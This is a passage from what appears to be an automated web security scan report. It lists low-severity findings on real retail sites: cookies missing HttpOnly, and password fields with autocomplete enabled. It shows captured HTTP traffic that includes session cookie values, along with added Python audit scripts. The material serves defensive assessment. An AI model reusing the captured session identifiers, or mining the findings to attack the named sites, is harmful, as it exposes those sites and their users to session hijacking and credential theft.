Set-Cookie: TS1c138a=5bd8da43812e2d44f3717ac9451ad5a82efa223a5124b4964dd08c2a; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:10:10 GMT


{"status":"-1","cartCount":"0"
   ,"wishList":"gl390568157"
   ,"giftLists":[]
   ,"firstName":""}

13.177. https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /sitewide/includes/header/expanding-banner-controller.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitewide/includes/header/expanding-banner-controller.jsp?categoryId=&section=my-account&subsection=sign-in&_=1305511197171 HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; engagement=4; fsr.a=1305511197072

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:10:21 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=f5d76e447a12f51b020b9a893d636ab62efa223a5124b4964dd08c32; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:10:18 GMT
Content-Length: 923

<script type="text/javascript">
       $(document).ready(function() {
           // Drop Down Banners with parameters for: banner div, cookie name, delay before appearing (in seconds), delay before disappearing (i
...[SNIP]...

13.178. http://www.toshibadirect.com/td/b2c/laptops.to

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/laptops.to

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BV_IDS (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; review the contents of the cookie to determine its function.

Request

GET /td/b2c/laptops.to?page=segHHO HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:2&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20s_invisit%3Dtrue%7C1305513075995%3B%20omtr_lv%3D1305511275997%7C1400119275997%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305513075997%3B%20s_nr%3D1305511275999%7C1308103275999%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305513076003%3B; s_sess=%20s_cc%3Dtrue%3B%20omtr_eVar49%3DD%253Dc49%3B%20s_ppv%3D34%3B%20SC_LINKS%3DSearch%253ALaptops%2520Home%2520Page%255E%255EMy%2520Account%255E%255ESearch%253ALaptops%2520Home%2520Page%2520%257C%2520My%2520Account%255E%255E%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3Dtoshibadirectprod%252Ctoshibaglobal%253D%252526pid%25253DSearch%2525253ALaptops%25252520Home%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.toshibadirect.com%2525252Ftd%2525252Fb2c%2525252Fmyaccount.to%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:34:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1110806401.1305542050@@@@;Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 293675


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 27 $ $Workfile: laptops.jsp $ -->


<script language="Java
...[SNIP]...

13.179. http://www22.glam.com/cTagsImgCmd.act

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.glam.com
Path:   /cTagsImgCmd.act

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: glam_sid and glam_cookie_sid (see the Set-Cookie headers in the response below; glam_cookie_sid is reset to 1 with an expiry date in the past, which clears it, while glam_sid is scoped to .glam.com and persists for two years). Neither appears to contain an application session token, which may reduce the risk associated with this issue; the names and the redirect to jsadimp.gif suggest tracking identifiers. Review the contents of each cookie to determine its function.

Request

GET /cTagsImgCmd.act?gname=ct&gvalue=pacsun&gtid=5000041577&gcmd=set&gdata=pacsun_rt HTTP/1.1
Host: www22.glam.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/17038/universal.html?page_name=ps_homepage&PS_Retargeting=1&mpuid=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_cookie_sid=115232130551023312111; ctags=%3bct%3dpacsun

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://www35t.glam.com/jsadimp.gif?1^0^627fc31aa29ca9b1f0af2f412de3c2e5^115232130551023312111^1^446224^/^1x1^5000041577^31230390^-1^-1^-1^-1^0^0^804013055112669599^p^^0^^US^511^0^0^0^WASHINGTON^0^0^0^0^^pacsun_rt
Set-Cookie: glam_sid=115232130551023312111; expires=Wed, 15 May 2013 02:01:06 GMT; path=/; domain=.glam.com;
Set-Cookie: glam_cookie_sid=1; expires=Sun, 15 May 2011 02:01:06 GMT; path=/; domain=.glam.com;
ETag: "662c9bddfc82c61ba8066514fc2b172e:1276888104"
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Cache-Control: max-age=734
Date: Mon, 16 May 2011 02:01:06 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

13.180. http://www26.orientaltrading.com/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www26.orientaltrading.com
Path:   /cm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: 90067112_reset (see the Set-Cookie header in the response below; the same numeric prefix appears as the ci parameter of the request). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; review the contents of the cookie to determine its function.

Request

GET /cm?tid=1&ci=90067112&vn2=e4.0&st=1305510857671&vn1=4.3.2&ec=utf-8&pi=HOME%20PAGE&cg=MAIN&pc=Y&rnd=1305520591450&ul=http%3A//www.orientaltrading.com/&lp=HOME%20PAGE HTTP/1.1
Host: www26.orientaltrading.com
Proxy-Connection: keep-alive
Referer: http://www.orientaltrading.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=17jLNQBXSqTLZLn22gSGhQZ1qn1JzhCKMpsNG12T0S6Y29Lzpcvx!-2120161015; otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; CoreID6=30061305510207274874166; TestSess3=30061305510207274874166; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; 90067112_login=1305510217010072986690067112; 90067112_reset=1305510217; fsr.s={"v":1,"rid":"1305510222528_763877","pv":1,"to":3,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1305510848788}; mt.v=1.322159034.1305510206640; fsr.a=1305510862665

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:11 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90067112_reset=1305511271;path=/
Expires: Sun, 15 May 2011 08:01:11 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;
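The flag check behind the instances above can be reproduced offline. The script below is an added example written for this edit, not the scanner's own logic or any code from the sites listed: it parses Set-Cookie values copied from the responses in 13.177 through 13.180, reports which protective flags each cookie lacks, and applies a name-based heuristic (SESSION_NAME_RE, an assumption of this example) to highlight cookies that usually carry a session token and therefore deserve a closer look.

```python
"""Audit Set-Cookie headers for missing HttpOnly/Secure flags.

Added example, not part of the original scan report. SAMPLES are copied
from the responses in instances 13.177-13.180 above; SESSION_NAME_RE is
this example's own heuristic, not the scanner's logic.
"""
import re
from dataclasses import dataclass, field

# Assumed heuristic: cookie names that commonly hold a session identifier.
SESSION_NAME_RE = re.compile(r"sess|sid|auth|token|login", re.I)


@dataclass
class CookieFinding:
    name: str
    scheme: str                              # "http" or "https" of the issuing response
    missing: list = field(default_factory=list)
    looks_like_session: bool = False


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {attr_lower: value}).

    Tolerates a trailing ';' (as in the glam.com headers above) and
    attribute values containing commas, such as Expires dates.
    """
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_cookie(scheme, header_value):
    """Return a CookieFinding listing the protective flags that are absent."""
    name, _value, attrs = parse_set_cookie(header_value)
    finding = CookieFinding(
        name=name,
        scheme=scheme,
        looks_like_session=bool(SESSION_NAME_RE.search(name)),
    )
    if "httponly" not in attrs:
        finding.missing.append("HttpOnly")
    # Secure only matters when the cookie was set over TLS; a cookie set
    # over plain HTTP is already exposed on the wire.
    if scheme == "https" and "secure" not in attrs:
        finding.missing.append("Secure")
    return finding


# (scheme, Set-Cookie value) pairs copied from the responses above.
SAMPLES = [
    ("https", "TS1c138a=f5d76e447a12f51b020b9a893d636ab62efa223a5124b4964dd08c32; Path=/"),
    ("http", "BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1110806401.1305542050@@@@;Path=/"),
    ("http", "glam_sid=115232130551023312111; expires=Wed, 15 May 2013 02:01:06 GMT; path=/; domain=.glam.com;"),
    ("http", "90067112_reset=1305511271;path=/"),
]


def audit_all(samples=SAMPLES):
    return [audit_cookie(scheme, value) for scheme, value in samples]


if __name__ == "__main__":
    for f in audit_all():
        flag = "SESSION?" if f.looks_like_session else ""
        print(f"{f.name:20} missing={','.join(f.missing) or '-':18} {flag}")
```

Run it against a proxy log export to triage quickly: a missing HttpOnly on a cookie the heuristic marks SESSION? is the one to escalate, since that is the cookie a reflected XSS (section 5 of this report) would read.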

14. Password field with autocomplete enabled
There are 46 instances of this issue:

Issue background

Most browsers can remember credentials entered into HTML forms. The feature is controlled by the user and, to a degree, by the application. When it is enabled, credentials the user enters are stored on the local machine and replayed by the browser on later visits to the same form.

Stored credentials can be recovered by an attacker who gains access to the machine, locally or through a remote compromise. There have also been techniques by which a malicious site retrieves credentials saved for other applications, either through browser vulnerabilities or through application-level cross-domain attacks. The most common practical case is cross-site scripting on the same origin: once the browser autofills the login form, injected script can read the password field's value and send it elsewhere.

Issue remediation

To discourage browsers from storing credentials entered into HTML forms, add autocomplete="off" to the FORM tag (covers every field in the form) or to the individual INPUT tags (covers only those fields). Treat this as a hint rather than a control: current versions of the major browsers ignore autocomplete="off" on password fields and still offer to save the password. On registration and password-change forms, autocomplete="new-password" is the attribute that current password managers honour, so that the stored credential is not filled into the new-password field.
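The check the scanner performs for this issue can be reproduced offline. The following is an added example written for this edit, not the scanner's code or the site's: it parses HTML, tracks the enclosing form, and reports every password input for which neither the input nor its form carries autocomplete="off". SAMPLE_HTML is constructed from the FTD form fragments shown in instances 14.1 to 14.8; the form-level autocomplete="off" on the reminder-signup form and the whole /hardened-signin/ form are hypothetical additions so that the negative cases are exercised too.

```python
"""Report password fields that a browser may offer to save.

Added example, not the scanner's or the site's code. SAMPLE_HTML is
constructed from the FTD form fragments in instances 14.1-14.8; the
autocomplete="off" on the reminder form and the /hardened-signin/ form
are hypothetical additions for the negative cases.
"""
from html.parser import HTMLParser


class PasswordAutocompleteScanner(HTMLParser):
    """Collect (form action, field name) for each <input type=password>
    where neither the input nor its enclosing <form> has autocomplete=off."""

    def __init__(self):
        super().__init__()
        self._form = None        # attributes of the currently open <form>
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Valueless attributes arrive as None; normalise them to "".
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = a
        elif tag == "input" and a.get("type", "").lower() == "password":
            form = self._form or {}
            form_off = form.get("autocomplete", "").lower() == "off"
            field_off = a.get("autocomplete", "").lower() == "off"
            if not (form_off or field_off):
                self.findings.append((form.get("action", ""), a.get("name", "")))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def find_autocomplete_password_fields(html):
    """Return [(action, name), ...] in document order."""
    scanner = PasswordAutocompleteScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


SAMPLE_HTML = """
<form method='post' name='account_details' action='/personal-info/'>
  <input type='hidden' name='AID' value="myaccount_create" />
  <input type="password" name="password" maxlength="18" size="25" value=''>
  <input type="password" name="password_ver" maxlength="18" size="25" value=''>
</form>
<form name="create_account" id="create_account" method="post" action="">
  <input type="password" name="password" id="password" maxlength="18"/>
  <input type="password" name="password_ver" id="password_ver" maxlength="18"/>
</form>
<form action="https://ordering.ftd.com/528/signin/">
  <input class="password" type="password" name="password" value="" maxlength="18" />
</form>
<!-- hypothetical: form-level autocomplete="off" added to the reminder form -->
<form name="create_reminder_account" method="POST" action="/reminder-signin/" autocomplete="off">
  <input type="password" name="password" size="15" maxlength="18" value=''/>
  <input type="password" name="password_confirm" size="15" maxlength="18" value='' />
</form>
<!-- hypothetical: field-level autocomplete="off" -->
<form method="POST" action="/hardened-signin/">
  <input type="password" name="password" autocomplete="off" />
</form>
"""


if __name__ == "__main__":
    for action, name in find_autocomplete_password_fields(SAMPLE_HTML):
        print(f"action={action!r:42} field={name}")
```

The check mirrors what the scanner flags; it says nothing about whether a given browser will actually honour the attribute, which for password fields most no longer do.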


14.1. https://ordering.ftd.com/new-signup/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /new-signup/

Issue detail

The page contains a form with the following action URL: /personal-info/ (form name account_details, method POST). The form contains the following password fields with autocomplete enabled: password and password_ver.

Request

GET /new-signup/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:42 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:42 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 117006


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</div>
   <form method='post' name='account_details' action='/personal-info/' style="margin-top: 0px;" onsubmit="if(document.account_details.email_isvalid.value == 1){return true;}else{valid_email(document.account_details.email.value, 1,'You have entered an invalid email address', function (){document.account_details.email_isvalid.value = 1;document.account_details.submit();});return false;}">
   <input type='hidden' name='AID' value="myaccount_create" />
...[SNIP]...
<span class='formw'>
               <input class="myaccount_info_form_input" type="password" name="password" maxlength="18" size="25" style="width:175;" value=''>
           </span>
...[SNIP]...
<span class='formw' style="padding-top: 2px;">
               <input class="myaccount_info_form_input" type="password" name="password_ver" maxlength="18" size="25" style="width:175px;" value=''>
           </span>
...[SNIP]...

14.2. https://ordering.ftd.com/new-signup/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /new-signup/

Issue detail

The page contains a form with the following action URL: "" (empty; form name create_account, whose onsubmit handler calls FS.create_account() and returns false, so submission is driven by script). The form contains the following password fields with autocomplete enabled: password and password_ver.

Request

GET /new-signup/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:42 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:42 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 117006


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

14.3. https://ordering.ftd.com/new-signup/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /new-signup/

Issue detail

The page contains a form with the following action URL: https://ordering.ftd.com/528/signin/ (the toolbar_signin_form sign-in widget). The form contains the following password field with autocomplete enabled: password. Note that this form declares no method attribute, so unless script intercepts the submit it would send the credentials as GET query parameters.

Request

GET /new-signup/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:42 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:42 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 117006


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001"> <form style="margin:0px;" action="https://ordering.ftd.com/528/signin/"> <table width="240" border="0" cellpadding="1">
...[SNIP]...
</label> <input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...

14.4. https://ordering.ftd.com/new-signup/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /new-signup/

Issue detail

The page contains a form with the following action URL: https://ordering.ftd.com/528/signin/ (the billing_page_signin_popup sign-in widget). The form contains the following password field with autocomplete enabled: password. As with the toolbar widget, the form declares no method attribute, so unless script intercepts the submit it would send the credentials as GET query parameters.

Request

GET /new-signup/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:42 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:42 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 117006


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273"> <form action="https://ordering.ftd.com/528/signin/"> <table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...

14.5. https://ordering.ftd.com/reminder-signin/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /reminder-signin/

